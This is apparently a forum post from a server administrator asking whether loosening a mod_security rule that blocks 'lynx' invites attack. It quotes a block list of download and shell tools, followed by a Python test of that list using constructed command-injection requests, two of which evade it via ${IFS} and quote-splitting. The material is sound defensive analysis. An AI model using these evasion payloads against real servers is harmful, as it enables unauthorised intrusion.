I was going through the audit logs this morning and found that a page
of a customer of mine was being blocked by mod_sec for no good reason
other than the fact that the parameters contained lynx (Ottawa-Lynx to
be exact). I doubt that there would be any other conflicts with linux
programs when it comes to sports teams. As you can see I modified the
rule for lynx to make sure it doesn't match a "-" in front of it. Am I
opening up my server to an attack if someone does something clever? How
would I make sure something doesn't get rejected if nothing malicious
was intended?
Thanks,
Jamie
---------------------------------------------------------------------------
# Block various methods of downloading files to a server
SecFilterSelective THE_REQUEST "wget "
SecFilterSelective THE_REQUEST "[^-]lynx "
SecFilterSelective THE_REQUEST "scp "
SecFilterSelective THE_REQUEST "ftp "
SecFilterSelective THE_REQUEST "cvs "
SecFilterSelective THE_REQUEST "rcp "
SecFilterSelective THE_REQUEST "curl "
SecFilterSelective THE_REQUEST "telnet "
SecFilterSelective THE_REQUEST "ssh "
SecFilterSelective THE_REQUEST "echo "
SecFilterSelective THE_REQUEST "links -dump "
SecFilterSelective THE_REQUEST "links -dump-charset "
SecFilterSelective THE_REQUEST "links -dump-width "
SecFilterSelective THE_REQUEST "links http:// "
SecFilterSelective THE_REQUEST "links ftp:// "
SecFilterSelective THE_REQUEST "links -source "
SecFilterSelective THE_REQUEST "mkdir "
SecFilterSelective THE_REQUEST "cd /tmp "
SecFilterSelective THE_REQUEST "cd /var/tmp "
SecFilterSelective THE_REQUEST "cd /etc/httpd/proxy "
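As an added example (Python, not part of the original post or of ModSecurity itself), here is what the posted patterns actually do when run against a few constructed request lines: the customer's page, two command-injection style payloads that name lynx, and two payloads that sidestep the whole list. It assumes that ModSecurity 1.x matches these patterns case-insensitively against THE_REQUEST, which the false positive on "Ottawa-Lynx" in the post implies; the request lines and the 203.0.113.9 address are made up for the example.

```python
import re

# The rule set exactly as posted (ModSecurity 1.x SecFilterSelective patterns).
POSTED_RULES = [
    "wget ", "[^-]lynx ", "scp ", "ftp ", "cvs ", "rcp ", "curl ", "telnet ",
    "ssh ", "echo ", "links -dump ", "links -dump-charset ", "links -dump-width ",
    "links http:// ", "links ftp:// ", "links -source ", "mkdir ",
    "cd /tmp ", "cd /var/tmp ", "cd /etc/httpd/proxy ",
]

# The lynx pattern before the "[^-]" change, for comparison.
ORIGINAL_LYNX_RULE = "lynx "


def first_matching_rule(the_request, rules=POSTED_RULES):
    """Return the first pattern that fires against THE_REQUEST, or None.

    Assumption: matching is case-insensitive, as the false positive on
    "Ottawa-Lynx" described in the post implies.
    """
    for pattern in rules:
        if re.search(pattern, the_request, re.IGNORECASE):
            return pattern
    return None


# Constructed request lines (not captured traffic); the host is a documentation
# address (RFC 5737) and is an assumption of this example.
SAMPLES = {
    # The legitimate page that triggered the block.
    "customer team page": "GET /team.php?name=Ottawa-Lynx HTTP/1.1",
    # Obvious injection attempts that still name lynx followed by a space.
    "lynx after shell separator": "GET /view.cgi?file=x;lynx http://203.0.113.9/s HTTP/1.1",
    "lynx with full path": "GET /view.cgi?file=x;/usr/bin/lynx http://203.0.113.9/s HTTP/1.1",
    # Payloads a shell would still run, but that never contain "lynx ".
    "space replaced by ${IFS}": "GET /view.cgi?file=x;lynx${IFS}http://203.0.113.9/s HTTP/1.1",
    "empty quotes split the word": "GET /view.cgi?file=x;ly''nx http://203.0.113.9/s HTTP/1.1",
}


def evaluate_all(samples=SAMPLES):
    """Map each sample name to (posted-rule hit, original lynx-rule hit)."""
    return {
        name: (first_matching_rule(req), first_matching_rule(req, [ORIGINAL_LYNX_RULE]))
        for name, req in samples.items()
    }


if __name__ == "__main__":
    for name, (posted, original) in evaluate_all().items():
        print(f"{name:30} posted rules: {posted!r:14} original lynx rule: {original!r}")
```

Run as a script it prints one line per sample. The "[^-]" change does exactly what was intended: the team page no longer fires, while ";lynx " and "/usr/bin/lynx " still do, because the character before lynx is ";" or "/". The last two samples show the limit of the approach rather than of the edit: every pattern in the list is a literal substring with a trailing space, so a payload that separates the command from its argument with ${IFS}, or breaks the word with empty quotes, is not matched by either version of the rule. Whether an exception is safer than a loosened pattern depends on what the parameter is used for; an exception scoped to the one parameter and page that legitimately carries "Ottawa-Lynx" keeps the original rule intact everywhere else.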